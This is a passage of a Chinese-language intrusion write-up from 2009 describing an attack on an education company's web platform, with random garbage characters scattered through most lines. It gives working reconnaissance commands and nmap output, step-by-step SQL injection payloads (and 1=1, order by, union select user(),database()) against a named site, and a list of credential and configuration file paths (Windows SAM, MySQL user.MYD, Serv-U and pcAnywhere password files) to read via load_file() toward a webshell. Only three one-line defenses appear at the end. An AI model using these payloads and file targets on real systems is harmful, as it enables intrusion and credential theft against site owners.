题记:
7 N) L% \5 ?+ M# P+ B一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……2 e4 `* K8 s: H+ F1 f6 ~
第一步:获取需要的信息" n$ ~1 q. \- l4 H) g2 ~
由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。! q1 x. Y0 N8 N2 H6 t, ~5 B
注:以下为保护特用XXX代替敏感信息
6 n) o+ h0 F( L, _2 F0 Q顺手先PING了一下他们的域名:
: K+ i% n) R5 p/ d3 [4 Dping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)5 T" s3 ]. `2 X, H" _- p
64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms2 p# q. z2 c j, `3 }
顺便了解一下TTL,学好基础知识才能一路顺风:
# W: z/ O8 Z' Z/ O8 Y5 f' LTTL:(Time To Live ) 生存时间
6 v' g Y/ B8 C1 t6 @6 V指定数据包被路由器丢弃之前允许通过的网段数量。$ z4 r+ c" e/ J9 E
TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。
' [, _4 y* M8 C* E8 {4 j使用PING时涉及到的 ICMP 报文类型. }* }) a; W9 V
一个为ICMP请求回显(ICMP Echo Request)
_4 p/ h! Z. L5 w一个为ICMP回显应答(ICMP Echo Reply)8 S9 f+ c% ~4 P3 d
TTL 字段值可以帮助我们识别操作系统类型。; S$ |+ g( N3 `1 ~* W
UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
7 \' r/ m% L8 a% u3 bCompaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
# m' E R' m( t8 m0 U+ s微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128
8 `4 _2 y& E* W4 s1 g微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 329 Q/ u1 H8 x# M
当然,返回的TTL值是相同的
}$ P: M/ a- J0 {6 J' b. }4 f但有些情况下有所特殊+ j5 o C# ]$ z+ Q1 z
LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64
4 j& U u4 ]+ DFreeBSD 4.1, 4.0, 3.4;: ]6 A1 s$ I# S, {7 m4 ~5 [$ K
Sun Solaris 2.5.1, 2.6, 2.7, 2.8;
- T& ~# @6 r1 z% j( p5 i- u+ gOpenBSD 2.6, 2.7,
0 [6 X7 e) }+ }( a5 ?; h" [- {! CNetBSD
) _+ V( v( l. }1 R4 XHP UX 10.20- U5 {. U: {/ h4 ?' w2 c+ W( a* }. u# N
ICMP 回显应答的 TTL 字段值为 2558 O) {7 s) F! d
Windows 95/98/98SE
8 [0 G M, x l5 \8 d7 KWindows ME
' b, u& B4 o5 x3 M# J KICMP 回显应答的 TTL 字段值为 32
; G/ k4 D5 C( ?8 I) S7 WWindows NT4 WRKS/ @5 B$ J/ H& F% t B, P6 J9 H; T* p
Windows NT4 Server' b1 e7 ~. `! Y% V! A$ [" ?& B
Windows 2000/ G3 u! B9 d5 ^& ?! x1 q
Windows XP
5 \* z9 N5 F9 w' ~/ W7 G/ ^% z4 DICMP 回显应答的 TTL 字段值为 128
4 p% ~1 U/ F# d! _6 Y- Y这样,我们就可以通过这种方法来辨别操作系统7 K4 `$ Z3 ~2 i: h) `1 ^
TTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255' g6 Y0 d/ \7 C/ y2 Z" z: v/ `0 l
用NMAP扫描一下:! P3 T, M$ }% Y0 U1 V1 G" A9 U
nmap -sT -O XXX.XXX.XXX.XXX5 d2 x1 O+ H S& {9 a
如果没有装WinPcap则会弹出提示: R' m# r s1 `" ^# Q6 E( ?
WARNING: Could not import all necessary WinPcap functions. You may need to upgr/ L: _: ]; |/ _! o
ade to version 3.1 or higher from http://www.winpcap.org. Resorting to connect(
! j) i+ c9 `* u* X, m) mode — Nmap may not function completely
4 L1 k4 j- S0 h1 fTCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher$ D& Z0 Z* [2 m! b* j
and iphlpapi.dll be installed. You seem to be missing one or both of these. Win
) r& i( Z0 s6 ~0 j; p$ G9 i. H ?pcap is available from http://www.winpcap.org. iphlpapi.dll comes with Win98 an
2 ]4 I& R" t3 X2 ~d later operating sytems and NT 4.0 with SP4 or greater. For previous windows v
, _# l) T$ E0 Z+ W* d5 \3 [8 aersions, you may be able to take iphlpapi.dll from another system and place it i5 [; F- B& Z5 N6 N( M
n your system32 dir (e.g. c:\windows\system32).9 v. R: P1 F9 }& H0 \9 Y+ c
QUITTING!* n; \0 y' |. F8 e0 ~4 k8 G
到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe! `3 F0 a) L) [4 P0 H
安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:
1 s9 D1 ^# \7 l* `9 TInteresting ports on XXX.XXX.XXX.XXX:
, J- b' O& p) ]* o! |3 zNot shown: 986 closed ports# c8 z, v1 o l @: J
PORT STATE SERVICE" W1 {' s+ m' z6 Q
21/tcp open ftp3 l& |: X2 W( M! }1 Y6 x# Z) E
22/tcp open ssh
: J' J6 D3 t7 d" _5 I23/tcp open telnet
0 q. r* H: w) s: q$ A& S K5 s80/tcp open http1 ]! O% V: t/ M) G9 Q
111/tcp open rpcbind9 l0 X. y) }0 n% U$ P8 E7 @! Y; [
135/tcp filtered msrpc$ H; K( i+ u9 g( C
139/tcp filtered netbios-ssn- g, N5 g( M- d
445/tcp filtered microsoft-ds% T4 G9 u A) o4 t$ m. |; C
513/tcp open login* D( r2 G1 s+ W8 r6 d* [
514/tcp open shell
: X9 |) D4 J4 m0 h# F593/tcp filtered http-rpc-epmap3 O& ?. b: ~' `" l) d1 i5 V
1720/tcp filtered H.323/Q.9318 z' `" J7 Y' O4 w9 U8 h6 P
3306/tcp open mysql
4 r' T% _, j' Y9 c- Y8 ^" K4444/tcp filtered krb524
# w2 U. {9 \0 y6 |! G% i: [Device type: WAP
' J- X* h; o' O8 wRunning: Linux 2.4.X* A3 s) H# S6 W6 s! P; C7 _
OS details: DD-WRT (Linux 2.4.35s)
& F! A' c; b% ]6 W0 nNetwork Distance: 13 hops/ e9 N/ J& ^, J' Z- K _+ `, H
看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
7 o! @1 ^3 Y' n6 u/ |6 L* G' Rlogin as:
8 D# [+ v+ G/ r1 \. m4 R- \Telnet23端口也是开着的,用telnet 命令链接一下:6 C4 e9 j" J3 P: L
telnet XXX.XXX.XXX.XXX0 M" F( N0 \8 [1 a/ t8 P
提示:
8 a! }% v/ q2 U7 BRed Hat Enterprise Linux Server release 5.2 (Tikanga)9 Y) h3 D# N% }$ ~5 A* p% [
Kernel 2.6.18-92.el5PAE on an i6868 S! j- f. {9 Z7 l* B
login:' ~: n3 r& k/ x9 s! V5 z* ?* y
获取HTTP头信息:
: }* {% Z6 H" y5 W9 u在本地执行如下PHP代码
; v* H7 e8 X" ^- `<?php. j6 ]: S' X4 [- G* s+ h4 g3 f
$url = ‘XXX.XXX.XXX.XXX’;; [' e \6 ]* I
print_r(get_headers($url));5 p( L/ w; o% N* m5 V
print_r(get_headers($url, 1));
) v& S$ @$ [ h?>: ~( o; S7 q$ u2 ~
将以上代码保存为PHP文件,执行:3 T( ` h0 n- y1 ~% ]8 ~1 w4 O/ w
Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
5 I1 D u3 V& }" l2 J现在可以得出结论:
' M& x/ u; ] `) x5 g$ a5 W系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)
- P9 H% u1 t' ~0 }* A: O6 Y2 G& f内核版本:Kernel 2.6.18-92.el5PAE on an i686
7 Y7 \) }. }. ]# x( `WEB服务器版本:nginx/0.7.61* o! O9 x0 n# Z+ D' K; o' d
第二步,开始测试寻找漏洞
2 ?' Y8 r+ F6 O* j5 g1 K$ b# V分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。0 j7 [$ V4 \" C0 F5 |) m
1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的
7 L! S$ Z' a* m/ T& H2、测试方法:在地址后加 and 1=1 和 and 1=2 测试 |) k- f$ T+ P4 p1 S/ {
http://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常
# L, g9 f& n3 U* |http://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误
" z& J5 V- O _. t, j3 e1 T恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续4 j, f. P. l; ~4 F
3、手工注入:
% R- I( V1 {; W6 e& H+ V; j9 \注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。
* M! Y) R8 k( M% \6 J2 \: g3.1 猜测当前表字段数. w6 m2 U! g6 f) l1 u( K" Y( g+ r
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
6 H7 C' A0 j( U7 b6 Y此处猜测有个简单的算法,都是有技巧的吗,呵呵: z, q6 n8 y0 Y. X
算法简单如下:
8 F# N4 t1 S- W: b% t第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;
4 ^+ Q# l2 h' F( `* d! q8 Q第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;5 t. e5 f3 d/ Y3 Q7 j3 p2 Q$ Y
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。6 W9 I I7 ?) j( W5 [/ ~, }
以此来判断,是否过界,配合取中算法猜出字段数。 i* t1 e- M& r* G3 W. }1 c
举例:
- `4 n g. y8 T' j) {http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常9 y! n& D u, e6 L7 a' k
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误 C1 K4 t. d0 e" T W
此时3则为我们要找的字段数。 b, A2 T! x6 z1 M
3.2 配合union联合查询字段在页面所位置
7 W+ Q; u T! b8 E3 _. l& q0 d我们已经知道了字段数为3,此时则可以做如下操作:
( c+ r8 X+ R1 S3 u( \http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3, U1 V. C) d7 ~( E2 P# ~
5 |5 Q" {' l7 u4 Z5 e
这样就可以测试到哪些字段在页面上有所显示了,如图:0 q) Z2 k0 U2 `) H4 r. w) t8 r3 z3 u
- S- }% ?& e# u! {4 @+ w# x5 o3.3 查敏感信息+ Z2 b' W) T# T* |$ V. a
这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。4 ^& S4 M$ [7 h: e3 _7 I
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()& |% e9 {+ b/ p4 ~3 O# l, N
3.3.1 先查数据库用户、数据库名,以备后用,如图:
* |, W/ Q6 I7 h! f" ?: v @
/ o- S8 F; u) k2 q得到数据库用户为root、数据库名为DBxx;; W( i7 E0 j( [
3.3.2 查配置文件
( @4 _0 s' ~0 K查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。% L, B. _& A( |) p, V8 o
查看文件有一定的条件限制:' I- Z% |( S3 q5 o9 E5 F; |: q" B
欲读取文件必须在服务器上
# n# k" F2 B, f( i; m8 N% u5 o必须指定文件完整的路径 x& R }. ?5 n: H) ~1 ^
必须有权限读取并且文件必须完全可读
( S' B) X, R7 Z- s6 I) Z+ y+ m欲读取文件必须小于 max_allowed_packet# v9 P4 G% {; Y7 M
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。% }0 t2 F& G* b
常用的一些:
3 F- y, P, ^0 T/ ]1 S/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
" R) F; z" V4 t% m [/usr/local/apache2/conf/httpd.conf5 E6 Y8 ?3 L5 o, F' h( B. S; n
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
) X5 a6 ^7 W* U$ f& x/usr/local/app/php5/lib/php.ini //PHP相关设置3 v8 ^/ z% U _. G& [; X
/etc/sysconfig/iptables //从中得到防火墙规则策略( b V V6 e i8 m( P* A% s- _
/etc/httpd/conf/httpd.conf // apache配置文件* _/ d m" T# }) j
/etc/rsyncd.conf //同步程序配置文件
; @# {1 J! e! o: t J. n/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.
# z v: C" t b/ {# Y5 f( O/etc/my.cnf //mysql的配置文件" A. c4 L+ p& u
/etc/redhat-release //系统版本9 P" ] M' e9 x: |2 D$ |
/etc/issue" T/ w- g3 _# e* _( F
/etc/issue.net: j, @, D/ Y# [+ ^4 y: X6 `
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码( p6 X7 t; T- f G$ ^- D
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
6 a7 g* F' j8 r& \4 ?: _1 y# U9 N1 u. pc:\Program Files\Serv-U\ServUDaemon.ini A' O/ A& ]: p$ M
c:\windows\my.ini //MYSQL配置文件
, h5 S- t) z/ b3 P! d8 m* `c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件+ K( A3 A1 V& z j* P6 m2 P0 o2 z
等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,
$ a/ H6 I0 L, _( h- `' ?- R* m ^c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码) h9 Z( _4 y& z! P
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
) J% }0 k9 u5 |, n" x# ^3 ac:\Program Files\RhinoSoft.com\ServUDaemon.exe. G: ]1 z" ~ \; `+ e* H
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件2 z( F g; j n: v# Q1 m4 s
//存储了pcAnywhere的登陆密码2 N3 [( e# U/ L+ F
由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。0 \7 O- b- }. U4 t, F- `' ~4 u
这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。
: L& {6 v$ I3 U& X最后:防范措施$ x, ]% b* ?) B- q/ j. F* Z
1、修复PHP注入漏洞;, i5 I( ?+ t) J) J/ }( y% n. i9 W5 \
2、Mysql使用普通权限的用户;
1 k# y1 t# U/ z7 i: U0 o3、升级linux内核至最新版本; |